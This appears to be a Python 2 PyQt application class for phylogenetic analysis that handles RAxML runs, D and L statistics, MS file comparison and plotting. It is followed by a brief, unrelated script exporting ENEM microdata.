self.calcGenD.save_location = "DGenStatistic_"
if self.lStatSaveLocation.text().encode('utf-8') != "":
self.calcGenD.save_location = self.lStatSaveLocation.text().encode('utf-8')
if self.lSpeciesTreeEntry.text().encode('utf-8') != "":
self.calcGenD.species_tree = self.getLSpeciesTree()
else:
self.calcGenD.species_tree = self.lSpeciesTreeNewickEntry.text().encode('utf-8')
if self.lUseDirCB.isChecked():
self.calcGenD.directory = self.lAlignmentDirEntry.text().encode('utf-8')
self.calcGenD.statistic = False
        # the statistic save location is now always required; a separate flag tracks whether to reuse an already generated statistic
self.calcGenD.useAlreadyGeneratedStat = False
if self.lStatisticFileCB.isChecked():
self.calcGenD.useAlreadyGeneratedStat = True
self.calcGenD.statistic = self.lStatisticFileEntry.text().encode('utf-8')
self.calcGenD.generatePlot = self.generatePlotCB.isChecked()
return True
def runGenD(self):
# if all error handling passes run RAxML
if self.genDValidInput():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.genDRunComplete:
rerun = self.question("Rerun Generalized D Statistic?", "Are you sure you want to rerun generalized d-statistic?")
# if the user selected the 'ok' button
if rerun == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.calcGenD.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.calcGenD.start()
def runGenD2(self):
# if all error handling passes run RAxML
if self.genDValidInput():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.genDRunComplete:
rerun = self.question("Rerun Generalized D Statistic?", "Are you sure you want to rerun generalized d-statistic?")
# if the user selected the 'ok' button
if rerun == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.calcGenD.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.calcGenD.start()
def runSW(self):
        # read the Smooth Winds inputs from the GUI text entries
self.calcSW.sequencePathText = self.entrySequencePath.text().encode('utf-8')
self.calcSW.sequenceLengthFloat = int(self.entrySequenceLength.text().encode('utf-8'))
self.calcSW.windowSizeFloat = int(self.entryWindowSize.text().encode('utf-8'))
self.calcSW.windowOffsetFloat = int(self.entryWindowOffset.text().encode('utf-8'))
        # start the Smooth Winds worker thread
self.calcSW.start()
def genDComplete(self):
self.runGenDStatBtn.setText("Rerun")
self.lProgressBar.setValue(100)
self.genDRunComplete = True
def addAlignmentEntry(self):
self.additionalAlignmentCounter += 1
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName("alignment_hl" + str(self.additionalAlignmentCounter))
# create btn to remove and add to horizontal layout
btn = QtGui.QToolButton()
btn.setObjectName("removeAlignmentBtn" + str(self.additionalAlignmentCounter))
btn.setText('-')
btn.setFixedHeight(21)
btn.setFixedWidth(23)
HL.addWidget(btn)
# create text entry and add to horizontal layout
entry = QtGui.QLineEdit()
entry.setReadOnly(True)
entry.setObjectName("alignmentEntry" + str(self.additionalFileCounter))
HL.addWidget(entry)
# create btn and add to horizontal layout
btn2 = QtGui.QToolButton()
btn2.setObjectName("alignmentBtn" + str(self.additionalFileCounter))
btn2.setText('...')
HL.addWidget(btn2)
self.alignmentParentVL.addLayout(HL)
self.additionalAlignmentEntries.append(entry)
btn.clicked.connect(lambda: self.removeFileEntry(HL, entry, btn, btn2))
btn2.clicked.connect(lambda: self.getFileName(entry))
def addReticulationComboBox(self):
self.additionalReticulationCounter += 1
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName("reticulation_hl" + str(self.additionalReticulationCounter))
# create btn to remove and add to horizontal layout
btn = QtGui.QToolButton()
btn.setObjectName("removeReticulationBtn" + str(self.additionalReticulationCounter))
btn.setText('-')
btn.setFixedHeight(21)
btn.setFixedWidth(23)
HL.addWidget(btn)
# create combo box and add to horizontal layout
sourceComboBox = QtGui.QComboBox()
sourceComboBox.setObjectName("reticulationSource" + str(self.additionalReticulationCounter))
HL.addWidget(sourceComboBox)
# create label "=>" and add to horizontal layout
arrowLabel = QtGui.QLabel()
arrowLabel.setObjectName("arrow" + str(self.additionalReticulationCounter))
arrowLabel.setText("=>")
HL.addWidget(arrowLabel)
# create combo box and add to horizontal layout
targetComboBox = QtGui.QComboBox()
targetComboBox.setObjectName("reticulationTarget" + str(self.additionalReticulationCounter))
HL.addWidget(targetComboBox)
# create horizontal spacer and add to horizontal layout
hSpacer = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
HL.addItem(hSpacer)
# self.resize(self.width(), self.height() + 30)
self.reticulationComboBoxParentVL.addLayout(HL)
self.lStatisticSourceComboBoxes.append(sourceComboBox)
self.lStatisticTargetComboBoxes.append(targetComboBox)
# if an alignment has already been selected, populate any new reticulation boxes with the taxa from the alignment
if self.lAlignmentEntry.text() != "":
self.updateTaxonComboBoxes([sourceComboBox, targetComboBox], self.lAlignmentEntry)
btn.clicked.connect(lambda: self.removeReticulationComboBox(HL, sourceComboBox, arrowLabel, targetComboBox, btn, hSpacer))
def removeReticulationComboBox(self, HL, sourceComboBox, arrow, targetComboBox, btn, hSpacer):
HL.deleteLater()
sourceComboBox.deleteLater()
arrow.deleteLater()
targetComboBox.deleteLater()
btn.deleteLater()
# self.resize(self.width(), self.height() - 30)
self.lStatisticSourceComboBoxes.remove(sourceComboBox)
self.lStatisticTargetComboBoxes.remove(targetComboBox)
def getLSpeciesTree(self):
# read the species tree
with open(self.lSpeciesTreeEntry.text(), 'r') as stf:
st = stf.read().replace('\n', '')
return st
def updateLTree(self):
# read the species tree
with open(self.lSpeciesTreeEntry.text(), 'r') as stf:
self.lSpeciesTree = stf.read().replace('\n', '')
# Regular expression for identifying floats
# float_pattern = "([+-]?\\d*\\.\\d+)(?![-+0-9\\.])"
# remove branch lengths
# self.lSpeciesTree = ((re.sub(float_pattern, '', self.lSpeciesTree)).replace(":", "")).replace("\n", "")
# generate new image
self.plotter.treeImage(self.lSpeciesTree) # rooted=True, outgroup="O"
# set background image
self.lImagePixmap = QtGui.QPixmap('imgs/LStatisticTree.png')
self.lImageLabel.setScaledContents(True)
self.lImageLabel.setPixmap(self.lImagePixmap)
def getReticulations(self):
"""
Output:
a list of tuples (a,b) where a is the source taxa and b is the target taxa of the reticulation
"""
sourceNodes = [cb.currentText().encode('utf-8') for cb in self.lStatisticSourceComboBoxes]
targetNodes = [cb.currentText().encode('utf-8') for cb in self.lStatisticTargetComboBoxes]
return [(sourceNodes[i], targetNodes[i]) for i in range(len(sourceNodes))]
def getAlignments(self):
"""
Output: a list of alignments
"""
return [entry.text().encode('utf-8') for entry in self.additionalAlignmentEntries]
def login(self, password):
"""
If the password is correct, displays l-statistic page.
Otherwise, displays appropriate error message.
"""
if (password == "<PASSWORD>"):
self.lStatisticStackedWidget.setCurrentIndex(1)
else:
moreInfo = "\"" + password + "\" is incorrect. please try again or contact <EMAIL>"
self.message("Incorrect Password", "The password you entered is incorrect.", moreInfo)
def keyPressEvent(self, e):
"""
Allows user to use enter/return key to submit password on password page.
"""
super(PhyloVisApp, self).keyPressEvent(e)
if e.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
if (self.stackedWidget.currentIndex() == 5):
if (self.lStatisticStackedWidget.currentIndex() == 0):
self.login(self.lStatPasswordLineEdit.text())
def displayLStatistic(self, alignments_to_d, alignments_to_windows_to_d, v, r):
self.regularOutputLabel.setText(str(r))
self.verboseOutputLabel.setText(str(v))
if self.calcGenD.generatePlot:
for dd in alignments_to_windows_to_d:
d = alignments_to_windows_to_d[dd]
windows_to_lvals = {}
sigVec = []
for i in d:
windows_to_lvals[i] = (d[i])[0]
if d[i][1]:
sigVec.append(1)
else:
sigVec.append(0)
self.lStatisticWindow = lStatisticWindow.LStatisticWindow(windows_to_lvals, sigVec)
def displayDGEN2(self, r):
self.regularOutputLabel.setText(str(r))
#self.verboseOutputLabel.setText(str(v))
# if self.calcGenD.generatePlot:
# for dd in alignments_to_windows_to_d:
# d = alignments_to_windows_to_d[dd]
# windows_to_lvals = {}
# sigVec = []
# for i in d:
# windows_to_lvals[i] = (d[i])[0]
# if d[i][1]:
# sigVec.append(1)
# else:
# sigVec.append(0)
# self.lStatisticWindow = lStatisticWindow.LStatisticWindow(windows_to_lvals, sigVec)
#
#set progress bar to done
def displaySW(self, r):
self.showResultsSW.setText(str(r))
# **************************** MS PAGE ****************************#
additionalFileCounter = 0
additionalFileEntryNames = []
def runMSCompare(self):
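        """
        Reads the MS comparison settings from the GUI, validates the populated fields,
        and starts the msComparison worker thread.
        """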
try:
self.msComparison.msToRax = False
self.msComparison.msFiles = []
self.msComparison.msTruth = self.checkEntryPopulated(self.msFileEntry, errorTitle='Missing MS Truth File', errorMessage='Please select an MS Truth file.')
if self.checkboxCompareAgainstMS.isChecked():
self.msComparison.msFiles.append(self.msSecondFileEntry.text())
for i in range(len(self.additionalFileEntryNames)):
entry = self.findChild(QtGui.QLineEdit, self.additionalFileEntryNames[i])
self.msComparison.msFiles.append(self.checkEntryPopulated(entry, errorTitle='Blank Field', errorMessage='Field ' + str(i + 1) + ' is blank. Please select a file.'))
if self.checkboxCompareAgainstRaxml.isChecked():
self.msComparison.msToRax = True
self.msComparison.raxmlDir = self.checkEntryPopulated(self.msRaxmlDirectoryEntry)
self.msComparison.windowSize = int(self.checkEntryPopulated(self.msWindowSizeEntry))
self.msComparison.windowOffset = int(self.checkEntryPopulated(self.msWindowOffsetEntry))
self.msComparison.robinsonFouldsBarPlot = self.checkboxRobinsonFouldsBarPlot.isChecked()
self.msComparison.percentMatchingSitesBarPlot = self.checkboxPercentMatchingSitesGraph.isChecked()
self.msComparison.tmrcaLineGraph = self.checkboxTMRCAGraph.isChecked()
if not (self.checkboxCompareAgainstRaxml.isChecked() or self.checkboxCompareAgainstMS.isChecked()):
raise ValueError('Nothing to Compare Against', 'Please compare against a raxml directory and/or additional MS files.', 'n/a')
if not (self.checkboxRobinsonFouldsBarPlot.isChecked() or self.checkboxPercentMatchingSitesGraph.isChecked() or self.checkboxTMRCAGraph.isChecked()):
raise ValueError('No Plots Selected', 'Please select at least one plot.', 'n/a')
self.msComparison.start()
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(ErrorTitle, ErrorMessage, ErrorDescription)
return
def plotMSCompare(self, unweightedData, percentMatchingSitesUnweighted, sitesToNewickMsMaps, msFiles, msTruthLabel):
if self.msComparison.robinsonFouldsBarPlot:
self.msRobinsonFouldsWindow = msRobinsonFouldsWindow.MSRobinsonFouldsWindow('Robinson Foulds Distance From MS Truth', unweightedData, groupLabels1=msFiles)
if self.msComparison.percentMatchingSitesBarPlot:
msFilesWithValues = list(map(lambda (i, msFileName): msFileName + ":" + str('%.3f'%(percentMatchingSitesUnweighted[i])), enumerate(msFiles)))
self.msPercentMatchingWindow = msPercentMatchingWindow.MSPercentMatchingWindow('Percent of Matching Topologies', percentMatchingSitesUnweighted, groupLabels1=msFilesWithValues)
if self.msComparison.tmrcaLineGraph:
self.msTMRCAWindow = msTMRCAWindow.MSTMRCAWindow(sitesToNewickMsMaps, [msTruthLabel] + msFiles)
def addFileEntry(self, horizontalLayoutName, entryName, btnName, btn2Name):
self.additionalFileCounter += 1
self.additionalFileEntryNames.append(entryName + str(self.additionalFileCounter))
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName(horizontalLayoutName + str(self.additionalFileCounter))
# create btn and add to horizontal layout
btn2 = QtGui.QToolButton(self.msMSCompareGroupBox)
btn2.setObjectName(btn2Name + str(self.additionalFileCounter))
btn2.setText('-')
btn2.setFixedHeight(21)
btn2.setFixedWidth(23)
HL.addWidget(btn2)
# create text entry and add to horizontal layout
entry = QtGui.QLineEdit(self.msMSCompareGroupBox)
entry.setReadOnly(True)
entry.setObjectName(entryName + str(self.additionalFileCounter))
HL.addWidget(entry)
# create btn and add to horizontal layout
btn = QtGui.QToolButton(self.msMSCompareGroupBox)
btn.setObjectName(btnName + str(self.additionalFileCounter))
btn.setText('...')
HL.addWidget(btn)
self.resize(self.width(), self.height() + 30)
self.msFileUploadMasterVL.addLayout(HL)
btn.clicked.connect(lambda: self.getFileName(entry))
btn2.clicked.connect(lambda: self.removeFileEntry(HL, entry, btn, btn2))
def removeFileEntry(self, HL, entry, btn, btn2):
HL.deleteLater()
entry.deleteLater()
btn.deleteLater()
btn2.deleteLater()
if entry.objectName() in self.additionalFileEntryNames:
self.additionalFileEntryNames.remove(entry.objectName())
if entry in self.additionalAlignmentEntries:
self.additionalAlignmentEntries.remove(entry)
# self.resize(self.width(), self.height() - 30)
# **************************** CONVERTER PAGE ****************************#
def convertFile(self):
try:
self.fileToBeConverted = self.checkEntryPopulated(self.fileConverterEntry, errorTitle='No Input File Selected', errorMessage='Please choose an input file.')
self.convertedFileDirectory = self.checkEntryPopulated(self.outputFileConverterEntry, errorTitle='No Output File Selected', errorMessage='Please choose an output file.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(ErrorTitle, ErrorMessage, ErrorDescription)
return
self.convertedFileName = self.convertedFileDirectory + '/convertedFile.' + self.outputFormatComboBox.currentText().lower() + '.txt'
self.fileConverter.inputFileName = self.fileToBeConverted
self.fileConverter.outputFileName = self.convertedFileName
self.fileConverter.inputFormat = self.inputFormatComboBox.currentText().lower()
self.fileConverter.outputFormat = self.outputFormatComboBox.currentText().lower()
self.fileConverter.start()
# **************************** RAXML PAGE ****************************#
def generateSpeciesTree(self):
try:
# get values from gui -- ensure that no fields are blank
self.raxmlOperations.inputFilename = self.checkEntryPopulated(self.inputFileEntry, errorTitle='Missing Alignment', errorMessage='Please select an alignment.')
self.raxmlOperations.windowSize = self.checkEntryInRange(self.windowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.raxmlOperations.windowOffset = self.checkEntryInRange(self.windowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.raxmlOperations.speciesTreeRooted = self.checkboxSpeciesTreeRooted.isChecked()
self.raxmlOperations.speciesTreeOutGroup = self.speciesTreeComboBox.currentText()
self.raxmlOperations.speciesTreeUseCustomRax = self.checkboxSpeciesTreeUseCustomRax.isChecked()
# if using custom rax -- make sure that the user doesn't use the -s or -n flags
self.raxmlOperations.speciesTreeCustomRaxmlCommand = ''
if self.checkboxSpeciesTreeUseCustomRax.isChecked():
self.raxmlOperations.speciesTreeCustomRaxmlCommand = self.checkEntryPopulated(self.speciesTreeRaxmlCommandEntry, errorTitle='No RAxML Command', errorMessage='Please enter a custom raxml command or uncheck the box.')
if re.search('([\-][n])|([\-][s])', self.speciesTreeRaxmlCommandEntry.text()):
raise ValueError('Invalid RAxML Command', 'Please do not specify the -s or -n flags.', 'the -s and -n flags will be handled internally based on the alignment you input.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return
self.raxmlOperations.raxml_species_tree(self.raxmlOperations.inputFilename, rooted=self.raxmlOperations.speciesTreeRooted, outgroup=self.raxmlOperations.speciesTreeOutGroup, customRax=self.raxmlOperations.speciesTreeUseCustomRax, customRaxCommand=self.raxmlOperations.speciesTreeCustomRaxmlCommand)
def requestedFigures(self):
requestedFigures = set()
if self.checkboxAllTrees.isChecked():
requestedFigures.add('Top Topologies Tree Visualization')
if self.checkboxScatterPlot.isChecked():
requestedFigures.add('Windows to Top Topologies Scatter Plot')
if self.checkboxDonutPlot.isChecked():
requestedFigures.add('Top Topology Frequency Donut Plot')
if self.checkboxWindowsToInfSites.isChecked():
requestedFigures.add('Windows to Informative Sites Line Graph')
if self.checkboxHeatMap.isChecked():
requestedFigures.add('Informative Sites Heat Map')
if self.checkboxRobinsonFoulds.isChecked():
requestedFigures.add('Robinson Foulds')
if self.checkboxPGTST.isChecked():
            requestedFigures.add('p(GT | ST)')
return requestedFigures
def generateHeatmap(self):
self.updatedDisplayWindows()
def generateFigures(self):
if self.runComplete:
if self.raxmlInputErrorHandling():
self.figuresToBeRegenerated = self.prevGeneratedFigures.intersection(self.requestedFigures())
if len(self.figuresToBeRegenerated) > 0:
# execute window
regen = self.question("Regenerate Figures?", "You have selected figures which have previously been generated. All selected figures will be generated. Are you sure you want to proceed?")
# if the user selected the 'ok' button
if regen == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.updatedDisplayWindows()
# if raxml hasn't been run before just run it
else:
self.updatedDisplayWindows()
def updatedDisplayWindows(self):
# run commands that are shared by all functions
if self.getNumberChecked() > 0:
num = self.topTopologies
topologies_to_counts, unique_topologies_to_newicks = self.topologyPlotter.topology_counter(rooted=self.rooted, outgroup=self.outgroupComboBox.currentText())
self.numberOfUniqueTopologiesLabel.setText(str(len(topologies_to_counts)))
if num > len(topologies_to_counts):
num = len(topologies_to_counts)
self.topologyPlotter.num = num
list_of_top_counts, labels, sizes = self.topologyPlotter.top_freqs(num, topologies_to_counts)
top_topologies_to_counts = self.topologyPlotter.top_topologies(num, topologies_to_counts)
windows_to_top_topologies, top_topologies_list = self.topologyPlotter.windows_to_newick(top_topologies_to_counts, unique_topologies_to_newicks, rooted=self.rooted, outgroup=self.outgroupComboBox.currentText()) # all trees, scatter, circle, donut
topologies_to_colors, scatter_colors, ylist = self.topologyPlotter.topology_colors(windows_to_top_topologies, top_topologies_list) # scatter, circle, (donut?)
# generate robinson foulds and pgtst graphs
if self.checkboxRobinsonFoulds.isChecked():
            self.prevGeneratedFigures.add('Robinson Foulds')
if self.checkboxWeighted.isChecked():
windows_to_w_rf, windows_to_uw_rf = self.statisticsCalculations.calculate_windows_to_rf(self.speciesTree, self.checkboxWeighted.isChecked())
self.robinsonFouldsWindow = robinsonFouldsWindow.RobinsonFouldsWindow('Weighted Robinson Foulds Distance', windows_to_w_rf, 'Unweighted Robinson Foulds Distance', windows_to_uw_rf)
else:
windows_to_uw_rf = self.statisticsCalculations.calculate_windows_to_rf(self.speciesTree, self.checkboxWeighted.isChecked())
self.robinsonFouldsWindow = robinsonFouldsWindow.RobinsonFouldsWindow('Unweighted Robinson Foulds Distance', windows_to_uw_rf)
if self.checkboxPGTST.isChecked():
self.prevGeneratedFigures.add('p(GT | ST)')
windowsToPGTST = self.statisticsCalculations.calculate_windows_to_p_gtst(self.speciesTree)
self.pgtstWindow = pgtstWindow.PGTSTWindow(windowsToPGTST, "p(gt|st)", xLabel="Windows", yLabel="Probability")
# generate donut plot
if self.checkboxDonutPlot.isChecked():
self.prevGeneratedFigures.add('Top Topology Frequency Donut Plot')
donut_colors = self.topologyPlotter.donut_colors(top_topologies_to_counts, topologies_to_colors) # donut
self.donutPlotWindow = donutPlotWindow.DonutPlotWindow('Frequency of Top Topologies', labels, sizes, donut_colors)
# generate scatter plot
if self.checkboxScatterPlot.isChecked():
self.prevGeneratedFigures.add('Windows to Top Topologies Scatter Plot')
self.scatterPlotWindow = scatterPlotWindow.ScatterPlotWindow('Windows to Top Topologies', windows_to_top_topologies, scatter_colors, ylist)
# generate informative sites heatmap graph
if self.checkboxHeatMap.isChecked():
self.prevGeneratedFigures.add('Informative Sites Heat Map')
sites_to_informative, windows_to_informative_count, windows_to_informative_pct, pct_informative = self.informativeSites.calculate_informativeness('windows', 0, self.heatmapPercentage.text(),alignment=self.inputFileEntry.text())
self.heatMapWindow = heatMapWindow.HeatMapWindow('Heat Map', sites_to_informative)
# generate windows to informative sites line graph
if self.checkboxWindowsToInfSites.isChecked():
self.prevGeneratedFigures.add('Windows to Informative Sites Line Graph')
sites_to_informative, windows_to_informative_count, windows_to_informative_pct, pct_informative = self.informativeSites.calculate_informativeness('windows', self.raxmlOperations.windowOffset)
self.windowsToInfSitesWindow = windowsToInfSitesWindow.WindowsToInfSitesWindow('Windows to Informative Sites', windows_to_informative_pct)
# generate bootstrap graph
if self.checkboxBootstrap.isChecked():
internal_nodes_i, internal_nodes_f = self.bootstrapContraction.internal_nodes_after_contraction(self.confidenceLevel)
self.bootstrapContractionWindow = bootstrapContractionWindow.BootstrapContractionWindow(internal_nodes_i, internal_nodes_f, self.confidenceLevel, xLabel="Window Indices", yLabel="Number of Internal Nodes")
# generate all trees graph
if self.checkboxAllTrees.isChecked():
self.prevGeneratedFigures.add('Top Topologies Tree Visualization')
self.allTreesWindow = allTreesWindow.AllTreesWindow('', topologies_to_colors, topologies_to_counts, rooted=self.checkboxRooted.isChecked(), outGroup=self.outgroupComboBox.currentText())
def raxmlInputErrorHandling(self):
"""
returns true if all tests pass otherwise false
"""
try:
# input alignment for raxml
self.raxmlOperations.inputFilename = self.checkEntryPopulated(self.inputFileEntry, errorTitle='Missing Alignment', errorMessage='Please select an alignment.')
self.raxmlOperations.windowSize = self.checkEntryInRange(self.windowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.raxmlOperations.windowOffset = self.checkEntryInRange(self.windowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.raxmlOperations.outGroup = self.outgroupComboBox.currentText()
self.raxmlOperations.model = self.modelComboBox.currentText()
self.raxmlOperations.isCustomRaxmlCommand = self.checkBoxCustomRaxml.isChecked()
self.raxmlOperations.bootstrap = self.checkboxBootstrap.isChecked()
self.raxmlOperations.rooted = self.checkboxRooted.isChecked()
self.rooted = self.checkboxRooted.isChecked()
            # if user is generating Top Topologies or scatter plot or donut plot or circle graph run error handling on top topologies entry
if self.checkboxAllTrees.isChecked() or self.checkboxScatterPlot.isChecked() or self.checkboxDonutPlot.isChecked():
self.checkEntryPopulated(self.numberOfTopTopologiesEntry, errorTitle='Number of Top Topologies Field is Blank', errorMessage='Please enter a number of top topologies.')
self.topTopologies = self.checkEntryInRange(self.numberOfTopTopologiesEntry, min=0, max=16, inclusive=False, errorTitle='Invalid Number of Top Topologies', errorMessage='Please enter an integer between 0 and 15.')
# bootstrap error handling
self.raxmlOperations.numBootstraps = 0
if self.checkboxBootstrap.isChecked():
self.confidenceLevel = self.checkEntryInRange(self.confidenceLevelEntry, min=0, max=100, errorTitle='Invalid Confidence Level', errorMessage='Please enter an integer between 0 and 100.')
self.raxmlOperations.numBootstraps = self.checkEntryInRange(self.numberOfBootstrapsEntry, min=2, errorTitle='Invalid Number of Bootstraps', errorMessage='Please enter an integer greater than 1.')
# if using custom rax -- make sure that the user doesn't use the -s or -n flags
if self.checkBoxCustomRaxml.isChecked():
self.raxmlOperations.customRaxmlCommand = self.checkEntryPopulated(self.customRaxmlCommandEntry, errorTitle='No RAxML Command', errorMessage='Please enter a custom raxml command or uncheck the box.')
if re.search('([\-][n])|([\-][s])', self.customRaxmlCommandEntry.text()):
raise ValueError, ('Invalid RAxML Command', 'Please do not specify the -s or -n flags.', 'the -s and -n flags will be handled internally based on the alignment you input.')
# species tree error handling
if self.speciesTreeEntry.text() != "" and self.newickFileEntry.text() != "":
raise ValueError, ('Multiple Species Trees', 'You have both selected a species tree file and entered a species tree. Please only do one.', 'Both the "Species Tree File and "Enter Species Tree" fields are populated. Please only use one.')
# if the user selects either statistic plot -- open the inputted newick and read it into memory as a string on a single line
if self.checkboxRobinsonFoulds.isChecked() or self.checkboxPGTST.isChecked():
if self.newickFileEntry.text() != "":
self.newickFileName = self.checkEntryPopulated(self.newickFileEntry, errorTitle='Missing Species Tree', errorMessage='Please select a species tree.', errorDescription='Please select a species tree.')
with open(self.newickFileEntry.text(), 'r') as f:
self.speciesTree = f.read().replace('\n', '')
else:
self.speciesTree = self.checkEntryPopulated(self.speciesTreeEntry, errorTitle='Missing Species Tree', errorMessage='Please select a species tree.', errorDescription='Please select a species tree.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return False
return True
def runRAxML(self):
# if all error handling passes run RAxML
if self.raxmlInputErrorHandling():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.runComplete:
rerunRax = self.question("Rerun RAxML?", "Are you sure you want to rerun RAxML?")
# if the user selected the 'ok' button
if rerunRax == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.raxmlOperations.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.raxmlOperations.start()
def raxmlComplete(self):
topologies_to_counts, unique_topologies_to_newicks = self.topologyPlotter.topology_counter(rooted=self.rooted, outgroup=self.outgroupComboBox.currentText())
self.numberOfUniqueTopologiesLabel.setText(str(len(topologies_to_counts)))
self.runBtn.setText("Rerun RAxML")
self.generateFiguresWrapper.setToolTip("")
self.generateFiguresWrapper.setEnabled(True)
self.progressBar.setValue(100)
self.runComplete = True
# **************************** ABSTRACT ****************************#
def message(self, title, description, extraInfo, type='Err'):
"""
        creates and displays a window displaying the message
"""
# create object
errMessage = QtGui.QMessageBox()
# set text
errMessage.setText(title)
errMessage.setInformativeText(description)
errMessage.setDetailedText(extraInfo)
# default pixmap for error
pixmap = QtGui.QPixmap('imgs/warning.png')
# set icon
errMessage.setIconPixmap(pixmap)
# execute window
errMessage.exec_()
def question(self, title, description, type='Question'):
"""
        creates and displays a window displaying the message
"""
# create object
qMessage = QtGui.QMessageBox()
# set text
qMessage.setText(title)
qMessage.setInformativeText(description)
# default pixmap for error
pixmap = QtGui.QPixmap('imgs/warning.png')
# set icon
qMessage.setIconPixmap(pixmap)
qMessage.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)
# execute window
return qMessage.exec_()
def checkEntryPopulated(self, entry, errorTitle='Field Not Populated', errorMessage='Please populate field.', errorDescription=None):
"""
checks if given entry is empty or not.
(i) if entry is populated returns text
(ii) otherwise raises value error
"""
# if user does not provide an error description generate one automatically
if not errorDescription:
errorDescription = 'relevant entry name: ' + str(entry.objectName())
text = str(entry.text())
if text == '':
raise ValueError(errorTitle, errorMessage, errorDescription)
return text
def checkEntryInRange(self, entry, min=(-1.0 * float('inf')), max=float('inf'), inclusive=True, errorTitle='Entry Out Of Range', errorMessage='', errorDescription=None):
"""
checks if value of given entry is in range.
i. if entry is in given range return it
ii. otherwise raises value error
"""
# if user does not provide an error description generate one automatically
if not errorDescription:
errorDescription = 'relevant entry name: ' + str(entry.objectName())
# check to make sure the entry is populated
if entry.text() != '':
val = float(int(float(entry.text())))
else:
raise ValueError, (errorTitle, errorMessage, errorDescription)
# check to make sure value is in range
if inclusive:
if val < min or val > max:
raise ValueError, (errorTitle, errorMessage, errorDescription)
else:
if val <= min or val >= max:
raise ValueError, (errorTitle, errorMessage, errorDescription)
return int(val)
def updateTaxonComboBoxes(self, comboBoxes, textEntry, require4Taxons=False):
"""
input:
i. comboBoxes - a list of comboBox widgets (drop down menus)
ii. textEntry - a text entry widget
            iii. require4Taxons=False - a boolean indicating whether or not to require that there be exactly four taxons in the file in the text entry
gets a list of taxons from the file in textEntry and sets the items in a list of combo boxes to that list of taxons.
"""
try:
if textEntry.text() == "":
return
# get list of taxon names from file
taxonNames = list(self.raxmlOperations.taxon_names_getter(textEntry.text()))
if require4Taxons:
# if there are not exactly 4 taxons
if len(taxonNames) != 4:
self.message('Warning.', 'The D Statistic is meant to be run on a 4 taxa alignment.', textEntry.text())
# clear each combo box
for comboBox in comboBoxes:
comboBox.clear()
# add the list of taxons to each combobox
for taxon in taxonNames:
for comboBox in comboBoxes:
comboBox.addItem(taxon)
for i in range(len(comboBoxes)):
comboBoxes[i].setCurrentIndex(i)
except:
self.message('Invalid File', 'Invalid alignment file. Please choose another.', 'Make sure your file has 4 sequences and is in the phylip-relaxed format.', type='Err')
return
def getNumberChecked(self):
"""
returns the number of checkboxes that are checked
"""
return (self.checkboxScatterPlot.checkState() + self.checkboxDonutPlot.checkState() + self.checkboxAllTrees.checkState()) / 2
def toggleEnabled(self, guiElement):
"""
toggles whether or not guiElement is enabled
"""
enabled = guiElement.isEnabled()
guiElement.setEnabled(not enabled)
def setWindow(self, window):
self.stackedWidget.setCurrentIndex(self.windows[window])
self.resize(self.windowSizes[window]['x'], self.windowSizes[window]['y'])
self.move(self.windowLocations[window]['x'], self.windowLocations[window]['y'])
def ensureSingleModeSelected(self, mode_selected, window):
for mode in self.menuMode.actions():
if mode != mode_selected:
mode.setChecked(False)
mode_selected.setChecked(True)
self.setWindow(window)
def saveFileAs(self, textEntry):
"""
        i. opens a dialog in which the user enters a file name to save
        ii. sets the text of the given text entry to match the file the user selected
"""
textEntry.setText(QtGui.QFileDialog.getSaveFileName(self, 'Export'))
def getFileName(self, textEntry):
"""
        i. opens a dialog in which the user selects a file
        ii. sets the text of the given text entry to match the file the user selected
"""
textEntry.setText(QtGui.QFileDialog.getOpenFileName())
textEntry.emit(QtCore.SIGNAL('FILE_SELECTED'))
def openDirectory(self, textEntry):
"""
i. open a dialog in which user selects a directory
ii. sets the text of given text entry to match the directory the user selected
"""
textEntry.setText(QtGui.QFileDialog.getExistingDirectory())
textEntry.emit(QtCore.SIGNAL("DIRECTORY_SELECTED"))
def openWindow(self, window, type='std'):
window.show()
if type == 'std':
window.plot()
elif type == 'tabs':
window.displayImages()
def openURL(self, url):
webbrowser.open(url, new=0, autoraise=True)
def setValidator(self, entry, validator):
if validator == 'Double':
entry.setValidator(QtGui.QDoubleValidator(entry))
elif validator == 'Int':
entry.setValidator(QtGui.QIntValidator(entry))
# def resizeEvent(self, event):
# print self.size()
# def moveEvent(self, QMoveEvent):
# print self.pos()
if __name__ == '__main__': # if we're running file directly and not importing it
app = QtGui.QApplication(sys.argv) # A new instance of QApplication
# initialize main input window
form = PhyloVisApp() # We set the form to be our PhyloVisApp (design)
form.show() # Show the form
form.move(600, 300)
sys.exit(app.exec_()) # and execute the app
|
StarcoderdataPython
|
3459738
|
import FuncoesDados
# Third part: export the result
microdados = FuncoesDados.MicrodadosENEM("MicrodadosFiltradosComQuest.csv", colunas=None)
microdados.exportar_resultado()
# microdados.mostrar_resultado()
